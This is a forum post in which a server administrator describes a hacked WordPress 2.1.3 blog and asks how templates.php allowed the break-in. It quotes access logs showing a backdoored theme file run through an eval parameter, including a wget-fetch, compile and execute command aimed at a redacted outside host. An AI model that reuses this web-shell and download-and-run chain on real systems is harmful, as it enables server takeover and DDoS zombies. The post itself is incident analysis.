Security Oddities

Hi,

One of my users runs a WordPress install (2.1.3) on my server. I recently came across a dodgy-looking process running as the user that my webserver runs under. A bit of grepping of the user’s logs lead me to believe that my server had been hacked and used as a zombie for DDOS attacks.

The log entries I found appeared to indicate that they had broken in via templates.php. Log entries below:

"GET /blogs/wp-admin/templates.php HTTP/1.1" 200 5856 "-"
"GET /blogs/wp-admin/wp-admin.css?version=2.1.3 HTTP/1.1" 200 19223 "http://www.xxxxxx.co.uk/blogs/wp-admin/templates.php"
<GET various JS/images>
"POST /blogs/wp-admin/templates.php HTTP/1.1" 302 - "http://www.xxxxxx.co.uk/blogs/wp-admin/templates.php"
"GET /blogs/wp-admin/templates.php?file=wp-content/themes/k2/404.php&a=te HTTP/1.1" 200 6056 "http://www.xxxxxx.co.uk/blogs/wp-admin/templates.php"

From my reading, this is showing that 404.php in the user’s k2 theme has been edited – this was borne out by the timestamp on 404.php. This was followed by the attack itself:

"GET /blogs/wp-content/themes/k2/404.php?eval=id HTTP/1.1" 200 224 "-"
"GET /blogs/wp-content/themes/k2/404.php?eval=cd%20/var/tmp;wget%20xxx.xxxxxxx.org/bash.c;gcc%20bash.c%20-o%20bash;rm%20bash.c HTTP/1.1" 200 437 "-"
etc

This was followed by launching the code compiled above and using templates.php to restore 404.php to normal.

My main question is: I’ve read about various XSS exploits in templates.php in the past – would 2.1.3 have been vulnerable to this? If not, how could this attack have taken place?

I’ve since asked this user to upgrade to 2.2.2 and have made sure there’s no world-writable files! 🙂

If anyone could shed some light here, I’d be grateful.

Many thanks,
xanthein.